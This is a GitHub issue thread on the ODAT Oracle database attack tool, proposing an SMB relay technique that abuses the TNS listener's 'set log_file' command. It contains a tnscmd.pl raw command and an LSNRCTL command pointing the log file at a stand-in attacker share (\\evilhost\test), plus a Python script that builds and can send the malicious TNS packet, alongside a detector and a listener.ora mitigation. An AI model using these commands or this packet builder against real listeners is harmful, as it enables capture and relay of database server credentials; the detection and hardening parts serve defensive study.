quentinhardy / odat

ODAT: Oracle Database Attacking Tool

FR: Additional SMB Auth method #13

Closed Lexus89 closed 8 years ago

Lexus89 commented 8 years ago

The method used for SMB authentication is ctxsys.context; however, according to this blog, another method exists. Perhaps this is also interesting to add.

https://erpscan.com/press-center/blog/smbrelay-bible-3-smbrelay-by-oracle/

"The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system."

We can use this method when we have the ability to connect remotely to the TNS listener.

Before 10g, the TNS listener is not protected by a password or the ‘ADMIN_RESTRICTIONS' option by default. We should use the ‘set_log' command for SMB relay.

The command ‘set_log' sets the path of the TNS listener's log file. We can use either an original Oracle tool – ‘lsnrctl' – or a Perl script – ‘tnscmd' – to exploit this vulnerability.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL> set log_file \\evilhost\test

The next connection to the TNS listener gives you the necessary UNC request for SMB relay.
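The `log_file` trick quoted above, as an added example that is not part of ODAT or the linked blog post: the script below builds the same `(COMMAND=log_file)` control string tnscmd.pl is given with `--rawcmd`, wraps it in a TNS connect packet laid out the way tnscmd.pl lays it out (the field values and the 58-byte data offset are taken from that layout and are an assumption, not something the issue states), and, for the defensive side, pulls the connect string back out of a captured packet and flags a `log_file` command whose VALUE is a UNC path. `evilhost` is the attacker-controlled SMB host from the issue; the `send_listener_command` helper is only for a listener you are authorised to test and is not run here.

```python
import re
import socket
import struct
from typing import Optional

TNS_CONNECT = 1           # TNS packet type "connect"
HEADER_LEN = 8            # packet length, checksum, type, reserved, header checksum
CONNECT_DATA_OFFSET = 58  # where the connect string starts in a tnscmd.pl-style packet


def build_set_log_command(unc_path: str, service: str = "LISTENER") -> str:
    """Return the listener control string that points the log file at unc_path.

    Same (COMMAND=log_file) string as the --rawcmd in the issue; only VALUE differs.
    """
    return (
        "(DESCRIPTION=(CONNECT_DATA="
        "(CID=(PROGRAM=)(HOST=)(USER=))"
        "(COMMAND=log_file)(ARGUMENTS=4)"
        f"(SERVICE={service})(VERSION=1)"
        f"(VALUE={unc_path})))"
    )


def build_tns_connect_packet(command: str) -> bytes:
    """Wrap a listener command in a TNS connect packet (all fields big-endian)."""
    data = command.encode("ascii")
    total_len = CONNECT_DATA_OFFSET + len(data)
    header = struct.pack(">HHBBH", total_len, 0, TNS_CONNECT, 0, 0)
    body = struct.pack(
        ">HHHHHHHHHHIH",
        0x0136,               # protocol version
        0x012C,               # lowest compatible version
        0x0000,               # service options
        0x0800,               # session data unit size
        0x7FFF,               # transport data unit size
        0x7F08,               # protocol characteristics
        0x0000,               # line turnaround value
        0x0001,               # the value 1, lets the peer detect byte order
        len(data),            # connect data length
        CONNECT_DATA_OFFSET,  # connect data offset
        0,                    # maximum receivable data
        0,                    # connect flags
    )
    # Trace and unique-id fields are not needed: zero-fill up to the data offset.
    padding = b"\x00" * (CONNECT_DATA_OFFSET - HEADER_LEN - len(body))
    return header + body + padding + data


def send_listener_command(host: str, command: str, port: int = 1521,
                          timeout: float = 5.0) -> bytes:
    """Send the packet to a listener you are authorised to test; return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_tns_connect_packet(command))
        return sock.recv(4096)


# Detection side: recover the connect string from a captured packet and flag a
# log_file command whose VALUE is a UNC path (two leading backslashes).
_LOG_FILE_CMD = re.compile(r"\(COMMAND=log_file\)", re.IGNORECASE)
_VALUE = re.compile(r"\(VALUE=([^)]*)\)", re.IGNORECASE)


def extract_unc_log_target(packet: bytes) -> Optional[str]:
    """Return the UNC path of a log_file command, or None for anything else."""
    if len(packet) < CONNECT_DATA_OFFSET or packet[4] != TNS_CONNECT:
        return None
    data_len, data_off = struct.unpack(">HH", packet[24:28])
    connect_str = packet[data_off:data_off + data_len].decode("ascii", "replace")
    if not _LOG_FILE_CMD.search(connect_str):
        return None
    match = _VALUE.search(connect_str)
    if match and match.group(1).startswith("\\\\"):
        return match.group(1)
    return None


if __name__ == "__main__":
    # Built and inspected locally only; nothing is sent.
    cmd = build_set_log_command(r"\\evilhost\test")
    pkt = build_tns_connect_packet(cmd)
    print(len(pkt), pkt[:8].hex())
    print(extract_unc_log_target(pkt))
```

The same parser can be pointed at listener traffic to catch the request before the listener reaches out to the share. On the listener side, `ADMIN_RESTRICTIONS_<listener_name> = ON` in listener.ora makes the listener refuse remote SET commands such as `set log_file`, which is the option the quoted text says pre-10g listeners lack by default.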

quentinhardy commented 8 years ago

Hello,

Thank you for the link. I have already read a post about this trick. We can use this method only on 8i and 9i. ODAT is not compatible with these versions yet because there is still much work to do on versions 10, 11 and 12. This feature will perhaps be added in a future version once all is done on versions 10, 11 and 12.

I appended a new line to the TODO list (c1efccf0339023ff7d1af42ec80fd869a7192e1e).